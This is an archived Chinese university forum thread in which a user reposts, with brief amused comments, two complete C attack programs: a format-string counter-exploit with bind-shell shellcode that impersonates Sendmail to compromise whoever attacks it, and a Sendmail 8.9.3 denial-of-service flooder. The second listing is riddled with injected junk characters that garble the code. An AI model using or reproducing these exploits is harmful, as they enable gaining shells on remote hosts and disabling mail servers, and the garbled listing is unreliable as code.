+ 湖南.大学生科技创新平台's Archiver

xi-_a_r-_ise 发表于 2008-8-22 00:05

nemo

看不到他的脸,不过看他的网站就知道他很有趣,, MU%gJ@-V+Y
[url=http://felinemenace.org/~nemo/]http://felinemenace.org/~nemo/[/url]
8iLv2m x 看上面的asc nemo很有趣吧。。cute!nCL&F7{muk J*T
下面这个exploit很淫荡啊,好像是别人的exploit有漏洞,他放在邮件服务器上狙击的,Bua8@sgt
hahaha...ca W+_:O
/* *  fireinthehole.c *   *  Counterstrike exploit for smdos (sendmail exploit) *  written by nemo (Neil Archibald) 2004 * *  Thanks to andrewg and mercy for helping me out with this. *   *    [ Need a challenge ? ] *    [ Visit [url]http://www.pulltheplug.com[/url] ] */#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <string.h>#include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/wait.h> #include <signal.h> #define SMTPPORT 25#define BANNER   "220 evil.whitehat.com ESMTP Sendmail 8.9.3\n"#define BACKLOG  50#define        MAXFMT         1024#define BSIZE         1048576 + 1  // From smdos.c ;)#define BINDPORT 65535 #define GOT      0x0804a104   // GOT to overwrite. (objdump -R smdos)#define EBPB         0xbffff914   // Address of ebp, can be seen using dpa or gdb.#define SCODEAD  0x0804a1a0   // Address of shellcode on the .bss#define DPA1         5#define DPA2     33#define DPA3     68#define counter(x)      ((a=(x)-b),(a+=(a<0?0x10000:0)),(b=(x)),a)int sin_size,evil_fd,currdpa  = 0;struct sockaddr_in my_addr,haX0r_addr;        // Address of the attacker.char shellcode[] = /* shellcode by Ilja van Sprundel ([email]ilja@netric.org[/email]) */"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x43\xff""\x49\x02\x6a\x10\x51\x50\x89\xe1\x5e\xb0\x66\xcd\x80\x89\x41\x04\xb0""\x66\x43\x43\xcd\x80\x43\xb0\x66\xcd\x80\x87\xd9\x89\xc3\xb0\x3f\xcd""\x80\x49\x79\xf9\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"   "\x52\x53\x89\xe1\xb0\x0b\xcd\x80";               void say(char *what,int sockfd,int b_read){        char buffer[BSIZE];        bzero(buffer,BSIZE);                usleep(1000);        if (b_read && read(sockfd,buffer,BSIZE - 1) == -1)        {                perror("read()");                exit(errno);        }        if (write(sockfd,what,strlen(what)) == -1)        {                perror("write()");                exit(errno);        }}int sendfstring(int sockfd){        int a , b = 0;        char buffer;        char fmt[MAXFMT];        printf("[+] Sending format strings.\n");        sprintf(fmt,"%%.%du%%%d$hn",counter(GOT & 0xffff),DPA2);        sprintf(fmt,"%s%%.%du%%%d$hn\n",fmt,counter((EBPB + 2) & 0xffff),DPA1);        say(fmt,sockfd,1); b=0;        sprintf(fmt,"%%.%du%%%d$hn\n",counter(GOT >> 0x10),DPA2);        say(fmt,sockfd,1); b=0;                       sprintf(fmt,"%%.%du%%%d$hn",counter(SCODEAD & 0xffff),DPA3);        sprintf(fmt,"%s%%.%du%%%d$hn\n",fmt,counter(EBPB & 0xffff),DPA1);        say(fmt,sockfd,1); b=0;        sprintf(fmt,"%%.%du%%%d$hn\n",counter((GOT + 2) & 0xffff),DPA2);        say(fmt,sockfd,1); b=0;                     while(read(sockfd,&buffer, 1) && a++ < BSIZE);        sprintf(fmt,"%%.%du%%%d$hn\n",counter(SCODEAD >> 0x10),DPA3);        say(fmt,sockfd,1);                      return 0;}int waitonsmtp(){        int sockfd;        int yes=1;        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {                perror("socket()");                exit(errno);        }        if (setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(int)) == -1) {                perror("setsockopt()");                exit(errno);        }        my_addr.sin_family = AF_INET;        my_addr.sin_port = htons(SMTPPORT);            my_addr.sin_addr.s_addr = INADDR_ANY;         memset(&(my_addr.sin_zero), '\0', 8);         if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) {                perror("bind()");                exit(errno);        }        if (listen(sockfd, BACKLOG) == -1) {                perror("listen()");                exit(errno);        }                return sockfd;}void shell(int sock){        fd_set fd_read;        char buff[1024];        int n;        while(1)         {                FD_SET(sock,&fd_read);                FD_SET(0,&fd_read);                if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;                if( FD_ISSET(sock, &fd_read) ) {                        n=read(sock,buff,sizeof(buff));                        if (n == 0) {                                printf ("Connection closed.\n");                                exit(EXIT_FAILURE);                        } else if (n < 0) {                                perror("read remote");                                exit(EXIT_FAILURE);                        }                        write(1,buff,n);                }                if ( FD_ISSET(0, &fd_read) ) {                        if((n=read(0,buff,sizeof(buff)))<=0){                                perror ("read user");                                exit(EXIT_FAILURE);                        }                        write(sock,buff,n);                }        }        close(sock);}        int conn(char *ip, int p){        struct sockaddr_in connaddr;        int sockfd;        connaddr.sin_family = AF_INET;        connaddr.sin_port = htons(p);        connaddr.sin_addr.s_addr = inet_addr(ip);        bzero(&(connaddr.sin_zero),8);        sockfd=socket(AF_INET,SOCK_STREAM,0);        if((connect(sockfd,(struct sockaddr*)&connaddr,sizeof(struct sockaddr))) < 0 )        {                return 0;        }        return sockfd;}int main(int ac, char **av){        int sockfd,shellfd;                printf("-( fireinthehole - [ Counterstrike code for smdos ] )-\n");        printf("                   -] nemo 2004 [-\n");        sockfd = waitonsmtp();        printf("[+] Waiting for attack.....\n");        sin_size = sizeof(struct sockaddr_in);        if ((evil_fd = accept(sockfd, (struct sockaddr *)&haX0r_addr,&sin_size)) == -1) {                perror("accept");        }                printf("[+] Incoming attack from evil hacker:  %s.\n",inet_ntoa(haX0r_addr.sin_addr));        sleep(3);        printf("[+] Impersonating Sendmail. ;)\n");        if (write(evil_fd,BANNER,strlen(BANNER)) == -1)                perror("write()");        if(sendfstring(evil_fd)) // Send format string sequence to attacker.                perror("send()");        printf("[+] Sending payload\n");        if (send(evil_fd, shellcode, strlen(shellcode), 0) == -1)                perror("send");        sleep(5);        close(evil_fd);        printf("[+] Checking for shell\n");         if((shellfd=conn(inet_ntoa(haX0r_addr.sin_addr),BINDPORT)))        {                 printf("[+] Got sh3ll! ;)\n\n");                 shell(shellfd);         } else {                printf("[+] Exploit unsuccesful! :(\n");        }        return 0;}

xi-_a_r-_ise 发表于 2008-8-22 00:06

[url=http://felinemenace.org/~nemo/exploits/fireinthehole.c]http://felinemenace.org/~nemo/exploits/fireinthehole.c[/url]

xi-_a_r-_ise 发表于 2008-11-13 05:51

smdos.c:(X ^y'FZ/jE
--- CUT HERE ---
g)yJj6d3x /*L&\u_WcB
By Michal Szymanski <[email=siwa9@box43.gnet.pl]siwa9@box43.gnet.pl[/email]>3La#A"A*XED9@*R
Sendmail DoS (up to 8.9.3);x+e3Z R5Cv.T7B
Sat Apr  3 00:12:31 CEST 1999
b3z.[-^Hp */
I:Io Y]S9e #include <stdio.h>
P]u)a#lh #include <sys/types.h>
%UGiF6GKd #include <sys/socket.h>
a0CY P&B6YS7~^ #include <netinet/in.h>bg2O kD'lT
#include <arpa/inet.h>1i)V#j&~B+c
#include <netdb.h>G3^ jf+aTl%t8x`
#include <errno.h>
P1E;z*]q2C #undef VERBOSE          /* define it, if MORECONN is undefined */
3a y,w |MCc #define MORECONN Up9Plbj!Rq
// #define RCPT_TO      "[email=foo@ftp.onet.pl]foo@ftp.onet.pl[/email]"3z9W.DBT"K6P
#define RCPT_TO "[email=foo@10.255.255.255]foo@10.255.255.255[/email]"
6`TxF4m]FD/]? #ifdef MORECONN
#m!}id SEVQ5VM #define MAXCONN 5I/YE@"n@!iZ
#endif&NwkC:v
#define BSIZE   1048576         /* df* control file size */9g Uc4I&x#|)qa-u3b
#define PORT    25A6eUnRO+|Q/l6BEM
char buffer[BSIZE];
$e$R4_!} C9R int sockfd,x,loop,chpid;+tdQ3W(aH8X9sQ,V
void usage(char *fname) {(gvC lP @3IK.[
fprintf(stderr,"Usage: %s <victim_host>\n",fname); _O,e8g X
exit(1);
x&M,RH6j"w,my MR }-j,D(YY*S P#f
void say(char *what) {
gH7l4{9[4b \ if (write(sockfd,what,strlen(what))<0) {
X7wg?d$}!BZ perror("write()");
~7f&iN1j exit(errno);
?&{;J y&_ }
q3WP HI9b n{4Q #ifdef VERBOSE t9}oX3LG_b1Q-q
fprintf(stderr,"<%s",what);
tTY)Q8}3Xo #endif8y_ ^s)S LjX
bzero(buffer,BSIZE);
M"QyBa W4t usleep(1000);6S"]3S vl/fHU,?
if (read(sockfd,buffer,BSIZE)<0) {H |:X$`4B&_y0VG
perror("read()");
V'A+h&~ V h exit(errno);
%P^j9{wG;k%} }
o ze.Dy3r #ifdef VERBOSE
l t9i.N"ps6rN7BN2~&X fprintf(stderr,buffer);K'J[{1wB5o S
#endifQvw-B!rd
} ~{e-T7Z!A&{ pd
                        .H*P&if"G)Q#Q ^
int main(int argc,char *argv[]) {rS ?oomK9k
struct sockaddr_in serv_addr;V6g9Y u_M#[
struct hostent *host;
,x/N4\` w@ char *hostname,hostaddr[20];
"mY8[)l{ N&V{:mj&PL fprintf(stderr,"Sendmail DoS (up to 8.9.3) by siwa9 [[email]siwa9@box43.gnet.pl[/email]]\n");I#EvE/](Y!R]
if (argc<2) usage(argv[0]);6P V/L1rXs?
#ifdef VERBOSE~{F"yB#},d/e.Al/N%Q
fprintf(stderr,">Preparing address. \n");@ t j9{4E&]/j
#endif
{ve,w4F7l w/z hostname=argv[1];@ X"U X%}&\9Q
serv_addr.sin_port=htons(PORT);
8N4E{ l:o MbF serv_addr.sin_family=AF_INET;M!K7z*|2r$`hd |
if ((serv_addr.sin_addr.s_addr=inet_addr(hostname))==-1) {
%CdE{2l0` C #ifdef VERBOSE/j1xa%d,w;N3L X
fprintf(stderr,">Getting info from DNS.\n");e6w3B(z w2l*p
#endif
hd:n Vy"k J if ((host=gethostbyname(hostname))==NULL) {y+i:D!hLd'R
herror("gethostbyname()");"A+m%LyT}&t(c ]
exit(h_errno);
aUH!Ar? l } MSy*@9B
serv_addr.sin_family=host->h_addrtype; E kZ&\Swd(`s
bcopy(host->h_addr,(char *)&serv_addr.sin_addr,host->h_length); FhSR JeSv^+l
#ifdef VERBOSE \S.].ia
fprintf(stderr,">Official name of host: %s\n",host->h_name);
n?S @P;i/N;N #endif]#zZ#N"wGU
hostname=host->h_name;~*RIIn ZP&H.P
sprintf(hostaddr,"%d.%d.%d.%d",(unsigned char)host->h_addr[0],
!Be adM f(t                                (unsigned char)host->h_addr[1],6f3}3{L:[^,q`
                               (unsigned char)host->h_addr[2],?z} m G
                               (unsigned char)host->h_addr[3]);!oh l1?+B['Y
}`3|%d`3P
else sprintf(hostaddr,"%s",hostname);
N8Q^dh}j2V$ODz #ifdef MORECONN%A5a9qoh?;]8{(^
for (;loop<MAXCONN;loop++) if (!(chpid=fork())) {
nPBuSEoN Y #endif
%_S,f~pNmH%e8D for(;;) {
k3z ]\1jG bzero(&(serv_addr.sin_zero),8);*w&X3lmHjB
if ((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) {
&\g,y]` perror("socket()");(^E6j,N&Mg4G
exit(errno);
\Q4~$V+Y!O\ }Kw$@(T;Ta \
if ((connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr))) == -1) {cq |Xah$T%l
perror("connect()");
V1_/U:Z:q^8V$D9n0Y exit(errno);JH D~R*U9G ^
}lW"z]&HP+d
#ifdef VERBOSE
2C"U2TWe|3A m)i fprintf(stderr,">Connected to [%s:%d].\n",hostname,PORT);
s)^P$mz #endifX b+SM$fwv4x[r
bzero(buffer,BSIZE);read(sockfd,buffer,BSIZE);
%lHi#s.`yM7zg8x0^ #ifdef VERBOSEIgaSR{+w
fprintf(stderr,buffer);
3}Vu t3]Q0}7t #else0A&K,u1_c3Qg4O2K6X _
fprintf(stderr,".");*T D8V h-p
#endif
"@^f&O&p~q'Y R say("helo foo\n"); LW ]0@3FTe;i6xl
say("mail from:root@localhost\n");a[&b~ KK6A
say("rcpt to:" RCPT_TO "\n");
e8D,MS7CMb say("data\n");
Uj:i%XfW [w$BvA G for (x=0;x<=BSIZE;x++) buffer[x]='X';write(sockfd,buffer,BSIZE); tA3At8`
say("\n.\n");St2@KY0IB%T7^'SK
sleep(1);
iM:]Zo9h$\ say("quit\n");6t#\#lA0_ kW ofbt0u
shutdown(sockfd,2);
l-A2E'`6zbU close(sockfd);-Q!K}` sh"}S
#ifdef VERBOSE"@tV:N}*?G(y
fprintf(stderr,">Connection closed succesfully.\n"); x7N9H)\D }
#endif
e'nos:`^'?;z }
-oW B$Ig&Y FgG #ifdef MORECONN
e&NrOk8k6? }
!s0gUG(xq waitpid(chpid,NULL,0);'FBNF/h3O&^8?:j
#endifA_br(^.{
return 0; xDr5I/D8u
}
ExM2}4W6z g --- CUT HERE ---

页: [1]

Powered by Discuz! Archiver 7.0.0  © 2001-2009 Comsenz Inc.